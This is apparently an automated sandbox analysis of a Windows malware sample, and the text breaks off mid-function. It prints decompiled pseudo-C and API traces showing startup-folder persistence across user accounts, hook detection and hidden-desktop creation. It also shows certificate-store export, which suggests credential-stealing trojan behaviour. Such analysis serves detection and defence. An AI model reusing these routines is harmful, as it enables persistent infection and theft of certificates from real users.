
SetErrorMode.KERNEL32(00008007), ref: 0041D549
GetCommandLineW.KERNEL32(?), ref: 0041D553
CommandLineToArgvW.SHELL32(00000000), ref: 0041D55A
LocalFree.KERNEL32(00000000), ref: 0041D5AF
Sleep.KERNEL32(000000FF,?,00000001), ref: 0041D605
ExitProcess.KERNEL32 ref: 0041D616

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID:
API String ID: 1184560534-0
Opcode ID: 608b5eafb51693992e70e4a2f6d922862ea64af791cd21e9ea49978d1dae7095
Instruction ID: db45d8f07fbc27e2cda46a034a07af96016d7186aec8b06fcefb0d1ce152b3a2
Opcode Fuzzy Hash: 608b5eafb51693992e70e4a2f6d922862ea64af791cd21e9ea49978d1dae7095
Instruction Fuzzy Hash: 1D21EAF0D4525579DF18ABB989183EE7F666F0230CF18809BD4416B292C77D85C5C71E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0041D21C, Relevance: 30.2, APIs: 20, Instructions: 242
synchronizationsleepshutdownCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041D21C(void* __ecx, void* __eflags, void* __fp0) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;
				void* _t88;
				void* _t92;
				int _t100;
				int _t108;
				void* _t113;
				intOrPtr _t130;
				void* _t145;
				void* _t147;
				void* _t152;
				void* _t154;
				void* _t170;

				_t170 = __fp0;
				_t136 = __ecx;
				_t152 = _t154 - 0x70;
				_t149 = _t152 + 0x50;
				 *(_t152 + 0x6f) = 0;
				if(E00416F1E(0, __ecx, _t152 + 0x50,  *0x423bbc) != 0) {
					 *(_t152 + 0x68) =  *(_t152 + 0x54);
					_t130 = E0041CE9A(_t152 + 0x68, __ecx,  *(_t152 + 0x50));
					 *((intOrPtr*)(_t152 + 0x60)) = _t130;
					if(_t130 == 0) {
						 *(_t152 + 0x68) = 0;
					}
					E00416FC6(_t152 + 0x50);
				}
				if( *(_t152 + 0x68) != 0x1e6) {
					__eflags =  *(_t152 + 0x68) - 0xc;
					if( *(_t152 + 0x68) != 0xc) {
						L41:
						E00411CFE( *((intOrPtr*)(_t152 + 0x60)));
						return  *(_t152 + 0x6f);
					}
					_t74 = E0041CA33(_t136, 0x8889347b, 2);
					 *(_t152 + 0x5c) = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						L39:
						__eflags =  *(_t152 + 0x7c) - 1;
						if( *(_t152 + 0x7c) == 1) {
							E00413763(0, _t149,  *0x423bbc);
						}
						goto L41;
					}
					E0041C9FB(0x19367401, _t152 - 0x18, 1);
					_t79 = E004154E1(_t152 - 0x18);
					_t149 = GetFileAttributesExW;
					__eflags = _t79;
					if(_t79 == 0) {
						L23:
						_t80 =  *0x423b64;
						__imp__IsWellKnownSid( *_t80, 0x16);
						__eflags = _t80 - 1;
						if(__eflags != 0) {
							 *(_t152 + 0x6f) = 0;
							_t82 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
							__eflags = _t82;
							if(_t82 == 0) {
								L29:
								_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
								_t84 = E00418123(_t136, E00410D21,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 8)));
								_t149 = 0x423bc0;
								 *(_t152 + 0x6f) = E00410D21(_t84, 0, 0x423bc0, _t152 - 0x294, E00410D21, 0x423bc0, __eflags, _t170);
								L30:
								__eflags =  *(_t152 + 0x6f) - 1;
								if( *(_t152 + 0x6f) == 1) {
									_t88 = E004135C5(_t152 - 0x294, 0, _t149, 0, _t152 + 0x4c);
									__eflags = _t88;
									 *(_t152 + 0x6f) = _t88 != 0;
									__eflags =  *(_t152 + 0x6f);
									if( *(_t152 + 0x6f) != 0) {
										E0041C9FB(0x1a43533f, _t152 - 0x18, 1);
										_t92 = CreateEventW(0x423b98, 1, 0, _t152 - 0x18);
										_t145 =  *(_t152 + 0x4c);
										 *(_t152 + 0x64) = _t92;
										 *(_t152 + 0x68) = _t145;
										_push(0xffffffff);
										__eflags = _t92;
										if(_t92 != 0) {
											WaitForMultipleObjects(2, _t152 + 0x64, 0, ??);
										} else {
											WaitForSingleObject(_t145, ??);
										}
										_t149 = CloseHandle;
										__eflags =  *(_t152 + 0x64);
										if( *(_t152 + 0x64) != 0) {
											CloseHandle( *(_t152 + 0x64));
										}
										CloseHandle( *(_t152 + 0x50));
										CloseHandle(_t145);
									}
								}
								L38:
								E004154D1( *(_t152 + 0x5c));
								goto L39;
							}
							__eflags =  *(_t152 + 0x6f) - 0xe9;
							if( *(_t152 + 0x6f) != 0xe9) {
								goto L29;
							}
							_t100 = GetFileAttributesExW(0x423fce, 0x78f16360, _t152 + 0x68);
							__eflags = _t100 - 1;
							if(_t100 != 1) {
								goto L29;
							}
							_push( *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)))));
							E00418123(_t136, E0041108D,  *((intOrPtr*)( *((intOrPtr*)(_t152 + 0x60)) + 4)));
							_push( *((intOrPtr*)(_t152 + 0x78)));
							_t149 = 0x423bc0;
							_push(_t152 - 0x294);
							 *(_t152 + 0x6f) = E0041108D(_t152 - 0x294, 0,  *(_t152 + 0x68), 0x423bc0, E0041108D, 0x423bc0, __eflags);
							VirtualFree( *(_t152 + 0x68), 0, 0x8000);
							goto L30;
						}
						 *(_t152 + 0x6f) = E004113A5(__eflags);
						goto L38;
					} else {
						goto L20;
					}
					while(1) {
						L20:
						 *(_t152 + 0x6f) = 0;
						_t108 = ReadProcessMemory(0xffffffff, _t149, _t152 + 0x6f, 1, 0);
						__eflags = _t108;
						if(_t108 == 0) {
							goto L22;
						}
						__eflags =  *(_t152 + 0x6f) - 0xe9;
						if( *(_t152 + 0x6f) == 0xe9) {
							goto L23;
						}
						L22:
						Sleep(0x1f4);
					}
				}
				if(E00410FD6( *((intOrPtr*)(_t152 + 0x60))) != 0) {
					E0041C9FB(0x32901130, _t152 - 0x18, 1);
					_t113 = CreateMutexW(0x423b98, 1, _t152 - 0x18);
					 *(_t152 + 0x7c) = _t113;
					if(_t113 != 0) {
						if(GetLastError() == 0xb7) {
							CloseHandle( *(_t152 + 0x7c));
							 *(_t152 + 0x7c) = 0;
						}
						if( *(_t152 + 0x7c) != 0) {
							E0040B22C(_t136, _t152 - 0x8c);
							if(( *(_t152 - 0x8c) & 0x00000020) != 0) {
								 *0x423b60 =  *0x423b60 | 0x00000010;
							}
							E0040647F();
							if(( *0x423b60 & 0x00000010) != 0) {
								ExitWindowsEx(0x14, 0x80000000);
							}
							E0041C9FB(0x1a43533f, _t152 - 0x18, 1);
							_t147 = OpenEventW(2, 0, _t152 - 0x18);
							if(_t147 != 0) {
								SetEvent(_t147);
								CloseHandle(_t147);
							}
							E0041CF57(1);
							 *(_t152 + 0x6f) = 1;
							CloseHandle( *(_t152 + 0x7c));
						}
					}
				}
				goto L41;
			}

0x0041d21c
0x0041d21c
0x0041d21d
0x0041d234
0x0041d237
0x0041d241
0x0041d249
0x0041d24f
0x0041d254
0x0041d259
0x0041d25b
0x0041d25b
0x0041d261
0x0041d261
0x0041d26d
0x0041d34c
0x0041d350
0x0041d50d
0x0041d510
0x0041d51f
0x0041d51f
0x0041d35d
0x0041d362
0x0041d365
0x0041d367
0x0041d4fc
0x0041d4fc
0x0041d500
0x0041d508
0x0041d508
0x00000000
0x0041d500
0x0041d378
0x0041d381
0x0041d386
0x0041d392
0x0041d394
0x0041d3bc
0x0041d3bc
0x0041d3c5
0x0041d3cb
0x0041d3ce
0x0041d3e7
0x0041d3ea
0x0041d3ec
0x0041d3ee
0x0041d44a
0x0041d44d
0x0041d457
0x0041d45c
0x0041d46e
0x0041d471
0x0041d471
0x0041d475
0x0041d485
0x0041d48a
0x0041d48c
0x0041d490
0x0041d493
0x0041d4a0
0x0041d4b1
0x0041d4b7
0x0041d4ba
0x0041d4bd
0x0041d4c0
0x0041d4c2
0x0041d4c4
0x0041d4d6
0x0041d4c6
0x0041d4c7
0x0041d4c7
0x0041d4dc
0x0041d4e2
0x0041d4e5
0x0041d4ea
0x0041d4ea
0x0041d4ef
0x0041d4f2
0x0041d4f2
0x0041d493
0x0041d4f4
0x0041d4f7
0x00000000
0x0041d4f7
0x0041d3f0
0x0041d3f4
0x00000000
0x00000000
0x0041d404
0x0041d406
0x0041d409
0x00000000
0x00000000
0x0041d40e
0x0041d418
0x0041d41d
0x0041d429
0x0041d42e
0x0041d43f
0x0041d442
0x00000000
0x0041d442
0x0041d3d5
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d396
0x0041d396
0x0041d3a0
0x0041d3a3
0x0041d3a5
0x0041d3a7
0x00000000
0x00000000
0x0041d3a9
0x0041d3ad
0x00000000
0x00000000
0x0041d3af
0x0041d3b4
0x0041d3b4
0x0041d396
0x0041d27d
0x0041d28e
0x0041d29e
0x0041d2a4
0x0041d2a9
0x0041d2c0
0x0041d2c5
0x0041d2c7
0x0041d2c7
0x0041d2cd
0x0041d2da
0x0041d2e6
0x0041d2e8
0x0041d2e8
0x0041d2ef
0x0041d2fb
0x0041d304
0x0041d304
0x0041d315
0x0041d327
0x0041d32b
0x0041d32e
0x0041d335
0x0041d335
0x0041d339
0x0041d341
0x0041d345
0x0041d345
0x0041d2cd
0x0041d2a9
0x00000000

APIs

Part of subcall function 00416F1E: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F43
Part of subcall function 00416F1E: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0041D23F,?,?,00000000), ref: 00416F56

CreateMutexW.KERNEL32(00423B98,00000001,?,32901130,?,00000001,?,?,?,00000000), ref: 0041D29E
GetLastError.KERNEL32(?,?,00000000), ref: 0041D2AF
CloseHandle.KERNEL32(00000001,?,?,00000000), ref: 0041D2C5
ExitWindowsEx.USER32(00000014,80000000), ref: 0041D304
OpenEventW.KERNEL32(00000002,00000000,?,1A43533F,?,00000001,?,?,?,00000000), ref: 0041D321
SetEvent.KERNEL32(00000000,?,?,00000000), ref: 0041D32E
CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0041D335
CloseHandle.KERNEL32(00000001,00000001,?,?,00000000), ref: 0041D345
ReadProcessMemory.KERNEL32(000000FF,73BCF9B0,?,00000001,00000000,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D3A3
Sleep.KERNEL32(000001F4,?,?,00000000), ref: 0041D3B4
IsWellKnownSid.ADVAPI32(?,00000016,?,19367401,?,00000001,8889347B,00000002,?,?,00000000), ref: 0041D3C5
ReadProcessMemory.KERNEL32(000000FF,73BCF9B0,?,00000001,00000000,?,?,00000000), ref: 0041D3EA
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,00000000), ref: 0041D442
GetFileAttributesExW.KERNEL32(00423FCE,78F16360,?,?,?,00000000), ref: 0041D404

Part of subcall function 00418123: VirtualProtect.KERNEL32(00410D21,?,00000040,00000000,73BCF9B0,?,?,0041D45C,?,?,?,?,00000000), ref: 00418138
Part of subcall function 00418123: VirtualProtect.KERNEL32(00410D21,?,00000000,00000000,?,?,0041D45C,?,?,?,?,00000000), ref: 0041816B

CreateEventW.KERNEL32(00423B98,00000001,00000000,?,1A43533F,?,00000001,?,?,00000000,00423BC0,00000000,?,?,?), ref: 0041D4B1
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000), ref: 0041D4C7
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000), ref: 0041D4D6
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4EA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4EF
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0041D4F2

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$CreateEventFileVirtual$MemoryProcessProtectReadWait$AttributesErrorExitFreeKnownLastMultipleMutexObjectObjectsOpenSingleSizeSleepWellWindows
String ID:
API String ID: 561470431-0
Opcode ID: d849554906fc8518b7859a4076cb2f9e9e82454529ca5439cee87a8e213dfd44
Instruction ID: 327e05929bed2d9028adb7989d351d1932e4ad0a59857dc3bac0b92929e34b97
Opcode Fuzzy Hash: d849554906fc8518b7859a4076cb2f9e9e82454529ca5439cee87a8e213dfd44
Instruction Fuzzy Hash: FF9181B190025CEFDF21AFA48D85EEE3FA9AF04314F00006BFD15A21A2C7789985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004113A5, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004113A5(void* __eflags) {
				char _v5;
				char* _v12;
				char _v16;
				int _v20;
				int _v24;
				int _v28;
				int _v32;
				char _v56;
				char _v88;
				char _v608;
				short _v1128;
				char _v1648;
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t63;
				int _t69;
				char _t70;
				char _t76;
				int _t80;
				char _t81;
				char _t82;
				char _t86;
				char _t88;
				WCHAR* _t98;
				int _t99;
				CHAR* _t110;
				char* _t111;
				WCHAR* _t112;
				struct HINSTANCE__* _t113;
				signed int _t114;
				void* _t115;

				_t112 =  &_v56;
				_v5 = 0;
				E00419897(0xe1, _t112);
				_t113 = LoadLibraryW(_t112);
				if(_t113 == 0) {
					L7:
					return 0;
				} else {
					_t110 =  &_v88;
					E00419861(0xe2, _t110);
					_t63 = GetProcAddress(_t113, _t110);
					if(_t63 != 0) {
						_push( &_v12);
						_t106 =  &_v608;
						_push( &_v608);
						_v12 = 0x104;
						if( *_t63() == 1) {
							_t98 =  &_v1128;
							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t98);
							if(_t98 == 0) {
								_t106 =  &_v608;
								_t99 = E0041284D(_t106);
								_v12 = _t99;
								if(StrCmpNIW(_t106,  &_v1128, _t99) == 0) {
									_t106 = _t115 + _v12 * 2 - 0x464;
									E0041209F(_t102 | 0xffffffff, _t115 + _v12 * 2 - 0x464,  &_v1128);
									_v5 = 1;
								}
							}
						}
					}
					FreeLibrary(_t113);
					if(_v5 != 0) {
						_v5 = 0;
						_v28 = 0;
						_t111 = L".exe";
						do {
							_v12 = 0;
							_t69 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v28);
							_v24 = _t69;
							__eflags = _t69;
							if(_t69 == 0) {
								L11:
								__eflags = _v12;
								if(_v12 == 0) {
									goto L24;
								}
								_t114 = 0;
								__eflags = _v20;
								if(_v20 <= 0) {
									L23:
									NetApiBufferFree(_v12);
									goto L24;
								} else {
									goto L13;
								}
								do {
									L13:
									_t80 = NetUserGetInfo(0,  *(_v12 + _t114 * 4), 0x17,  &_v16);
									__eflags = _t80;
									if(_t80 == 0) {
										_t81 = _v16;
										__eflags = _t81;
										if(_t81 != 0) {
											_t106 =  &_v608;
											_t82 = E0041D772( *((intOrPtr*)(_t81 + 0x10)),  &_v608);
											__eflags = _t82;
											if(_t82 != 0) {
												_t86 = E00417593( &_v1128,  &_v608,  &_v608);
												__eflags = _t86;
												if(_t86 != 0) {
													_t88 = E00417315( &_v608);
													__eflags = _t88;
													if(_t88 != 0) {
														__eflags = E004161B2(0,  &_v608,  &_v1648, _t111, 6);
														if(__eflags != 0) {
															__eflags = E00410AEC( &_v608, __eflags, 0,  &_v1648, 0);
															if(__eflags != 0) {
																_v5 = 1;
																E00410C19( &_v608, __eflags,  *((intOrPtr*)(_v16 + 0x10)),  &_v1648);
															}
														}
													}
												}
											}
											NetApiBufferFree(_v16);
										}
									}
									_t114 = _t114 + 1;
									__eflags = _t114 - _v20;
								} while (_t114 < _v20);
								goto L23;
							}
							__eflags = _t69 - 0xea;
							if(_t69 != 0xea) {
								break;
							}
							goto L11;
							L24:
							__eflags = _v24 - 0xea;
						} while (_v24 == 0xea);
						_t70 =  &_v1128;
						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t70);
						__eflags = _t70;
						if(_t70 == 0) {
							__eflags = E004161B2(0,  &_v1128,  &_v1648, _t111, 6);
							if(__eflags != 0) {
								_t76 = E00410AEC(_t106, __eflags, 0,  &_v1648, 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_v5 = 1;
								}
							}
						}
						return _v5;
					}
					goto L7;
				}
			}

0x004113b3
0x004113bb
0x004113be
0x004113cc
0x004113d0
0x0041146d
0x00000000
0x004113d6
0x004113d6
0x004113de
0x004113e7
0x004113ef
0x004113f4
0x004113f5
0x004113fb
0x004113fc
0x00411408
0x0041140a
0x00411418
0x00411420
0x00411422
0x00411428
0x0041142e
0x00411443
0x00411448
0x00411458
0x0041145d
0x0041145d
0x00411443
0x00411420
0x00411408
0x00411462
0x0041146b
0x00411474
0x00411477
0x0041147a
0x0041147f
0x00411495
0x00411498
0x0041149e
0x004114a1
0x004114a3
0x004114b0
0x004114b0
0x004114b3
0x00000000
0x00000000
0x004114b9
0x004114bb
0x004114be
0x0041157a
0x0041157d
0x00000000
0x00000000
0x00000000
0x00000000
0x004114c4
0x004114c4
0x004114d1
0x004114d7
0x004114d9
0x004114df
0x004114e2
0x004114e4
0x004114ea
0x004114f4
0x004114f9
0x004114fb
0x0041150b
0x00411510
0x00411512
0x0041151b
0x00411520
0x00411522
0x0041153b
0x0041153d
0x0041154d
0x0041154f
0x0041155e
0x00411562
0x00411562
0x0041154f
0x0041153d
0x00411522
0x00411512
0x0041156a
0x0041156a
0x004114e4
0x00411570
0x00411571
0x00411571
0x00000000
0x004114c4
0x004114a5
0x004114aa
0x00000000
0x00000000
0x00000000
0x00411583
0x00411583
0x00411583
0x00411590
0x004115a1
0x004115a7
0x004115a9
0x004115c2
0x004115c4
0x004115cf
0x004115d4
0x004115d6
0x004115d8
0x004115d8
0x004115d6
0x004115c4
0x00000000
0x004115dc
0x00000000
0x0041146b

APIs

LoadLibraryW.KERNEL32(?,73B75B60,73BCF9B0,00000000), ref: 004113C6
GetProcAddress.KERNEL32(00000000,?), ref: 004113E7
SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00411418
StrCmpNIW.SHLWAPI(?,?,00000000), ref: 0041143B
FreeLibrary.KERNEL32(00000000), ref: 00411462
NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,0041D3D5,?,?), ref: 00411498
NetUserGetInfo.NETAPI32(00000000,?,00000017,?), ref: 004114D1
NetApiBufferFree.NETAPI32(?,?,?), ref: 0041156A
NetApiBufferFree.NETAPI32(?), ref: 0041157D
SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 004115A1

Strings

.exe, xrefs: 0041147A, 00411526, 004115AD

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
String ID: .exe
API String ID: 1753652487-4119554291
Opcode ID: d0212774bc16a396e6d4e0b9b8b91699891a353717a1e8bb99c1ac5279902fde
Instruction ID: 09dae47a09f6c5e9f5b3411b93845a48c799259748f8cad0d7c7aca3b55140e0
Opcode Fuzzy Hash: d0212774bc16a396e6d4e0b9b8b91699891a353717a1e8bb99c1ac5279902fde
Instruction Fuzzy Hash: FC617471900218BFDF10DB94CC85EEF77BDAB45344F0045AAF652F21A2E7399A89CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00413620, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00413620(void* _a4, WCHAR* _a8) {
				WCHAR* _v5;
				char _v12;
				signed int _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				struct _PROCESS_INFORMATION _v40;
				struct _STARTUPINFOW _v108;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t31;
				WCHAR* _t49;
				long _t50;
				intOrPtr* _t52;

				_v5 = 0;
				_t28 = LoadLibraryA("userenv.dll");
				_v20 = _t28;
				if(_t28 != 0) {
					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
					_v24 = _t31;
					if(_t52 != 0 && _t31 != 0) {
						_push(0);
						_push(_a4);
						_push( &_v16);
						_v16 = 0;
						if( *_t52() == 0) {
							_v16 = 0;
						}
						_t50 = 0x44;
						_v12 = 0;
						E00411DB1( &_v108,  &_v108, 0, _t50);
						_t49 = _a8;
						_v108.cb = _t50;
						_v108.lpDesktop = 0;
						if(_t49 == 0) {
							_t49 =  &_v12;
						}
						asm("sbb eax, eax");
						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
							CloseHandle(_v40.hThread);
							CloseHandle(_v40);
							_v5 = _v40.dwProcessId != 0;
						}
						if(_v16 != 0) {
							_v24(_v16);
						}
					}
					FreeLibrary(_v20);
				}
				return _v5 & 0x000000ff;
			}

0x0041362e
0x00413631
0x00413637
0x0041363c
0x0041365a
0x0041365c
0x0041365e
0x00413663
0x00413671
0x00413672
0x00413678
0x00413679
0x00413680
0x00413682
0x00413682
0x00413687
0x0041368b
0x00413694
0x00413699
0x0041369c
0x0041369f
0x004136a4
0x004136a6
0x004136a6
0x004136b8
0x004136d5
0x004136e0
0x004136e5
0x004136ea
0x004136ea
0x004136f1
0x004136f6
0x004136f6
0x004136f1
0x004136fc
0x00413703
0x0041370a

APIs

LoadLibraryA.KERNEL32(userenv.dll,00000000), ref: 00413631
GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 00413650
GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0041365C
CreateProcessAsUserW.ADVAPI32(?,00000000,00410BFC,00000000,00000000,00000000,00410BFC,00410BFC,00000000,?,?,?,00000000,00000044), ref: 004136CD
CloseHandle.KERNEL32(?), ref: 004136E0
CloseHandle.KERNEL32(?), ref: 004136E5
FreeLibrary.KERNEL32(?), ref: 004136FC

Strings

CreateEnvironmentBlock, xrefs: 0041364A
userenv.dll, xrefs: 00413629
DestroyEnvironmentBlock, xrefs: 00413652

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
API String ID: 3080530829-1103369309
Opcode ID: e1adfb6a43a5139a5b53241b4213f41724ec8b669e3c9fc05fb9d20d4c27fc41
Instruction ID: 9d1078056966c1d07337da42f794009eddb96c37953e8b11179e925ec30f906a
Opcode Fuzzy Hash: e1adfb6a43a5139a5b53241b4213f41724ec8b669e3c9fc05fb9d20d4c27fc41
Instruction Fuzzy Hash: F82127B2D0021DBBDF119FA5DC849EEBBBCEB08345F10847AE505F6260D6389E44CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004108EC, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004108EC(void* __ecx, void* __eflags, WCHAR* _a4) {
				char _v5;
				struct HWINSTA__* _v12;
				struct HWINSTA__* _v16;
				char _v32;
				char _v48;
				void* __esi;
				struct HWINSTA__* _t23;
				WCHAR* _t28;
				int _t35;
				struct HWINSTA__* _t41;
				void* _t43;
				WCHAR* _t45;
				struct HDESK__* _t46;

				_t43 = __ecx;
				_t45 =  &_v32;
				_v5 = 0;
				E00419897(0xcc, _t45);
				_t23 = OpenWindowStationW(_t45, 0, 0x10000000);
				_v12 = _t23;
				if(_t23 != 0) {
					L2:
					_v16 = GetProcessWindowStation();
					if(E004108C4(_t50, _v12) == 0) {
						L13:
						CloseWindowStation(_v12);
						L14:
						return _v5;
					}
					_t28 = _a4;
					_a4 = _t28;
					if(_t28 == 0) {
						_t37 =  &_v48;
						_a4 =  &_v48;
						E00419897(0xcd, _t37);
					}
					_t46 = OpenDesktopW(_a4, 0, 0, 0x10000000);
					if(_t46 != 0) {
						L7:
						if(E0041087F(_t43, _t54, GetThreadDesktop(GetCurrentThreadId()), _t46) != 0) {
							L9:
							_v5 = 1;
							L10:
							CloseDesktop(_t46);
							if(_v5 != 0) {
								goto L13;
							}
							goto L11;
						}
						_t35 = SetThreadDesktop(_t46);
						_v5 = 0;
						if(_t35 == 0) {
							goto L10;
						}
						goto L9;
					} else {
						_t46 = CreateDesktopW(_a4, 0, 0, 0, 0x10000000, 0);
						_t54 = _t46;
						if(_t46 == 0) {
							L11:
							_t58 = _v16;
							if(_v16 != 0) {
								E004108C4(_t58, _v16);
							}
							goto L13;
						}
						goto L7;
					}
				}
				_t41 = CreateWindowStationW(_t45, 0, 0x10000000, 0);
				_v12 = _t41;
				_t50 = _t41;
				if(_t41 == 0) {
					goto L14;
				}
				goto L2;
			}

0x004108ec
0x004108f7
0x004108ff
0x00410902
0x00410911
0x00410917
0x0041091c
0x00410935
0x0041093e
0x00410948
0x004109d3
0x004109d6
0x004109dc
0x004109e3
0x004109e3
0x0041094e
0x00410951
0x00410956
0x00410958
0x0041095b
0x00410965
0x00410965
0x00410976
0x0041097a
0x00410990
0x004109a6
0x004109b6
0x004109b6
0x004109ba
0x004109bb
0x004109c4
0x00000000
0x00000000
0x00000000
0x004109c4
0x004109a9
0x004109af
0x004109b4
0x00000000
0x00000000
0x00000000
0x0041097c
0x0041098a
0x0041098c
0x0041098e
0x004109c6
0x004109c6
0x004109c9
0x004109ce
0x004109ce
0x00000000
0x004109c9
0x00000000
0x0041098e
0x0041097a
0x00410924
0x0041092a
0x0041092d
0x0041092f
0x00000000
0x00000000
0x00000000

APIs

OpenWindowStationW.USER32(?,00000000,10000000), ref: 00410911
CreateWindowStationW.USER32 ref: 00410924
GetProcessWindowStation.USER32 ref: 00410935
OpenDesktopW.USER32(?,00000000,00000000,10000000), ref: 00410970
CreateDesktopW.USER32 ref: 00410984
GetCurrentThreadId.KERNEL32 ref: 00410990
GetThreadDesktop.USER32(00000000), ref: 00410997
SetThreadDesktop.USER32(00000000,00000000,00000000), ref: 004109A9
CloseDesktop.USER32(00000000,00000000,00000000), ref: 004109BB
CloseWindowStation.USER32(?,?), ref: 004109D6

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
String ID:
API String ID: 2917431391-0
Opcode ID: d1ef42d8897c7f21b344082d8ad81f262cfed197469cc207eb56ad9ce1beea56
Instruction ID: 2b993e89a5c5570a505465c8290035d04d5b826f6b14cab2b59e762501ee87c4
Opcode Fuzzy Hash: d1ef42d8897c7f21b344082d8ad81f262cfed197469cc207eb56ad9ce1beea56
Instruction Fuzzy Hash: 95217FB5800248BFEB106FB59C98ADF7F78DB09345F00807AF804B3221D6788DC58BA8

Uniqueness

Uniqueness Score: -1.00%

Function 004053DF, Relevance: 12.1, APIs: 8, Instructions: 119encryptiontimeCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,00401638), ref: 004053FA
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00405416
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00405422
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00405461
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 00405491
CharLowerW.USER32 ref: 004054AF
GetSystemTime.KERNEL32(?), ref: 004054BA
CertCloseStore.CRYPT32(?,00000000), ref: 00405543

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
String ID:
API String ID: 3751268071-0
Opcode ID: 3cf8494495d2f0484629289c92d486b48812d15a4210bb23f812a3e8d39d4dd6
Instruction ID: a4d880268f85837dbc9e12c7aa458864c68fb0b4f3fd3437969bba756a20544a
Opcode Fuzzy Hash: 3cf8494495d2f0484629289c92d486b48812d15a4210bb23f812a3e8d39d4dd6
Instruction Fuzzy Hash: 0941A771108341ABD710AF65DD41AAFBBDDEB88304F40093FB988F31A0D634DD458B66

Uniqueness

Uniqueness Score: -1.00%

Function 0040647F, Relevance: 12.1, APIs: 8, Instructions: 114
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040647F() {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				long _v580;
				void* _v588;
				void* __esi;
				void* _t42;
				struct tagPROCESSENTRY32W* _t45;
				signed int _t47;
				void* _t48;
				long _t65;
				int _t71;
				void** _t72;
				void* _t73;

				_t71 = 0;
				_v5 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t42 = CreateToolhelp32Snapshot(2, _t71);
